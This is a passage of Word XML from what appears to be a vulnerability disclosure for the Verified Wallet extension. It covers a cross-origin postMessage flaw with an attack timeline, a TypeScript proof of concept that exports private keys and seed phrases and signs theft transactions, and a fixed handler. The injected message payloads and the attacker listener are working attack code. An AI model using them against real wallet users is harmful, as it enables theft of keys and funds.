    <w:p w14:paraId="22DE4A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this.custody.exportPrivateKey();  // Vulnerable call!      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DE6D1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res({ success: true, data: privateKey });                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240D01B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});                                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2206F5C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└──────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>──────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000FFD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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008F577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 chrome.runtime.sendMessage response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161BE69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</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476A45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300EF4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Content Script Response Handler                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E87A1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                                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229FC10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window.postMessage({                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BC339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type: "VW_RES",                                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00149EE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params: { data: "0x1234567890..." }  // Private key!      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32208C0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│ }, "*");  // </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>❌</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Broadcasts to ALL origins                   </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A81A3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└──────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>──────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D03AB1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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C87B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│ postMessage to "*"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363BD89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</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F19B9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3FEA84D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Attacker Website (attacker.com)                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F6DA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                                                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731D321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window.addEventListener("message", (event) =&gt; {              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421851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console.log(event.data.params.data);  // Private key!      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0472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  // Attacker now has full access to user's wallet           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BC17A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│ });                                                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E3F69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757732E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Real-World Attack Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E7B48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Timeline of Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C05BAA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text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D716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Time T0: User installs Verified Wallet extension </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007F5C4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T1: User visits their favorite DeFi platform (legitimate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310383C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T2: Attacker injects malicious JavaScript into DeFi platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE44D4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(via XSS, compromised CDN, malicious dependency, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477581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T3: Injected code sends:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E8D4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window.postMessage({ type: "VW_REQ", </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C28D9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                 params: { method: "exportPrivateKey" }}, "*")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2632563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T4: Content script receives message (no origin check)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7421C9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T5: Background script calls custody SDK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F385D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Time T6: Custody SDK exports private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4060D1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T7: Content script broadcasts response with private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D57DC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T8: Attacker's JavaScript catches response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBB4BA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T9: Attacker now has user's private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4251D9C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T10: Attacker signs transaction stealing all user funds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591B68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 T11: User loses 100% of custody assets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7D2B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37719E46">
          <v:rect id="_x0000_i1239" style="width:0;height:.75pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C03BC5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PROOF OF CONCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165E194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PoC 1: Node.js/TypeScript Exploitation Demo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FD467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exploit-poc.ts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3984EC2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typescript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6401A9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>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A08F68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Verified Wallet Custody SDK - Message Injection Exploit PoC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AA488B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Demonstrates unauthorized access to custody key management functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ADEC71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via cross-origin message injection vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06546CC4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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDD5A24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DISCLAIMER: For authorized security testing only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D807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 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9512D7" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="650083E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import { VerifiedCustody } from '@verified-network/verified-custody';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD0AE19" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B3E0FA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>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CAC63E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Simulates the vulnerable content.js message handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C23EFD2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This shows how the missing origin validation allows exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4271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 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4BF1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class VulnerableWalletHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F74D1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private custody: VerifiedCustody;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA6E284" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="704CC5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constructor() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3D1B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this.custody = new VerifiedCustody({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F65B03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  <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// Extension configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B25E24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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5766B5C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1A577F89" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C47D1E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>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7200B346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  * VULNERABLE MESSAGE HANDLER (Current Code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEA7A4B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  * Simulates: scripts/content.js line 22975-22987</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01625E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   */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CE150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async vulnerableHandler(message: any, origin: string): Promise&lt;any&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0990A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console.log(`\n[VULNERABLE] Received message from: ${origin}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100007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6C34497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Current code only checks: if (evnt.source !== window)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF392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Does NOT check origin!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175884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39E242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(message.type === "VW_REQ") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381C5A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method = message.params?.method;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CA70B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1B5418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  <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// EXPLOIT CASE 1: Private Key Export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044044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(method === "exportPrivateKey") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308EE9B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console.log(`[EXPLOIT] Calling exportPrivateKey from untrusted origin!`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A7CC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4165892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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4AB2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const privateKey = await this.custody.exportPrivateKey();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB06C7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4E3EEA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console.log(`[SUCCESS] Private key exported:`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA8AA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  Partial: ${privateKey.substring(0, 20)}...`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B46BD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  Length: ${privateKey.length} characters`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9955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  [ATTACKER CAN NOW]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286532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Import into another wallet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4D723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Sign arbitrary transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F22AAC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Steal all user funds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFE5A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Export seed phrase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD462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      - Transfer ownership`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD5AEC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699E4C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78DB46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0F3D1A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true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362D00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data: privateKey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777539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672F75A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 catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C258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14CE9F6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55C5415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false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B68EFD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error: error.message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C6C6C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0BC4A3C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11CCAB5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73D6077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74E938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  <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// EXPLOIT CASE 2: Transaction Signing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3226592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(method === "signTransaction") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0436355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console.log(`[EXPLOIT] Signing transaction from untrusted origin!`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA9D34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441A2D5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const tx = message.params.transaction || {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4B57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to: "0x742d35Cc6634C0532925a3b844Bc5e8Cc1c22C79",  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// Attacker address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5460EAE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value: "999999 ETH",  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// All user's funds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251FA5A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gasLimit: "21000",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A22274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data: "0x"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B495FB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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EA3E5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7D6716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console.log(`[SIGNING] Transaction Details:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D5417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From: User's Custody Account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3D96F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To: ${tx.to} (ATTACKER)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD69EF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Value: ${tx.value} (ALL FUNDS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039D13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    Status: NO USER CONFIRMATION`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C065C7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5B16AA7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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F971BA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const signature = await this.custody.signTransaction(tx);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330DCA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3327770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console.log(`[SUCCESS] Transaction signed:`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0EDEA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  Signature: ${signature.substring(0, 30)}...`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3180779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  Status: Can be broadcast immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2878F4A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User loses all funds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434DD2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No recovery possible`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9913C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5A99026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3AFDF0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3B126C3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true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCDE85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data: signature,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12586A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txHash: "0x..." </w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// Simulated broadcast result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F73F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7C4DAB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 catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC9D40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3BD6FEA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41F45A2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false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5632A1C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error: error.message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F75C19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139167D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4C49B22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424405C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469DFF4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  <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// EXPLOIT CASE 3: Seed Phrase Export</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36562C4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(method === "exportSeedPhrase") {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22EDFE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console.log(`[EXPLOIT] Exporting seed phrase from untrusted origin!`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3FE89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71CBC98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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FFB2A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    const seed = await this.custody.exportSeedPhrase();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3975DD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79B4E0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console.log(`[SUCCESS] Seed phrase exported:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B06EE3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Can generate infinite wallets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EE601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Complete account compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8581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- Permanent loss of all assets`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8799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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232A29A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238D3A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7C0BD3E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true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CCCB32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data: seed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040203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5C5DD22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 catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1653CBF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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C51D4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type: "VW_RES",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5001C0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success: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E43E5A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error: error.message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCE96C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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397C33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6CE2E1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56E54F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362D2DC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E41238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return { success: false, error: "Unknown request" };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FCA06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2DA339DC" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69EF729A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>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220C7B4D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  * FIXED MESSAGE HANDLER (With Security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E30E6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   */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48ABEED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async fixedHandler(message: any, origin: string): Promise&lt;any&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F77A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console.log(`\n[FIXED] Received message from: ${origin}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F289DB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3436B7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1: Proper origin validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3233B41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allowedOrigins = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049095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"https://app.verified.network",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C20E0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"https://verified.network",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A0232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"https://dashboard.verified.network"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E71E4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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224BEEC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6147DD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(!allowedOrigins.includes(origin)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2CA5B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console.log(`[BLOCKED] Untrusted origin rejected: ${origin}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADEBD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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E21EE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success: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C875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error: "Origin not allowed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4362D5D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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B30AD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0CB3197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4DE3E74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2: Require user confirmation for sensitive operations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2B955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sensitiveOps = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120CCD3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"exportPrivateKey",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1029DA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"exportSeedPhrase",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AC5AF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"signTransaction",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2A7C6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"sendTransaction"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF2C6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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC22C8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331E59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method = message.params?.method;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C42C4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(sensitiveOps.includes(method)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6871990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console.log(`[PROTECTED] Sensitive operation requires user confirmation`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6907D62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6CAFED6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  <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// In real extension, shows UI dialog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3434B5E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userConfirmed = await this.simulateUserConfirmation(method);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653365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7FC66F1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(!userConfirmed) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9FDE0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  console.log(`[BLOCKED] User rejected operation`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6215A05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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B3FAF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success: false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAF069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error: "User rejected operation"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9D49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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3313712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0BE8201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6323B3B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6BB1AD5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Processing would continue here...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A54089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return { success: true };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D9AF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4E38CD2A" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7423B1B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private async simulateUserConfirmation(method: string): Promise&lt;boolean&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186614E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console.log(`  [UI] Showing confirmation dialog...`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3B82D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console.log(`  [UI] User must click "Approve"`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4917EF3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Attacker cannot interact with UI, so this fails</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3640DA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console.log(`  [UI] No user input (attacker cannot interact)`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711627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return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FB712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3E30D66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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729D591F" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1970ED34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>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C48AFF2" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> * RUN EXPLOITATION DEMONSTRATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9298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 */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ED77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async function demonstrateVulnerability() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1A62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5552A57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console.log("VERIFIED WALLET - CROSS-ORIGIN MESSAGE INJECTION EXPLOIT");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA2D8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285542F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69F692C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handler = new VulnerableWalletHandler();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336A046F" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0538E0E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</w:t>
      </w:r>
      <w:r w:rsidRPr="00C91A8C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>// Scenario 1: Attacker from malicious site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7217E74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console.log("\n\n" + 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1A11BE2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console.log("SCENARIO 1: Attacker from attacker.com exports private key");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B8D32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0E88879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26C63CD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result1 = await handler.vulnerableHandler(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E19CD0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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDBE1E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type: "VW_REQ",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347662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params: { method: "exportPrivateKey" }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC0585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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0A69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"https://attacker.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C87207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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F681C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59DC85E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>// Scenario 2: Attacker signs transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C08EE7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console.log("\n\n" + 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7DB224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console.log("SCENARIO 2: Attacker signs transaction stealing all funds");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363D7B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6FC1F8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7F6DE2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result2 = await handler.vulnerableHandler(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A8B03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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237DE8E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type: "VW_REQ",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305CD07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params: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B64A4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method: "signTransaction",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334D93D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transaction: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422C679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to: "0xAttackerAddress",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8F855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value: "1000 ETH",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FC3B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data: "0x"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8CC4A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466068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7B893A5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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9044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"https://malicious-defi.com"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9D9FD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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190A4604" w14:textId="77777777" w:rsidR="00C91A8C" w:rsidRPr="00C91A8C" w:rsidRDefault="00C91A8C" w:rsidP="00C91A8C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A2CB66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>// Scenario 3: Same with FIXED code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605F95E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console.log("\n\n" + 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4E0636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console.log("SCENARIO 3: Same requests with FIXED code (origin validation)");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5E061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351C32D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15D81C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result3 = await handler.fixedHandler(</w:t>
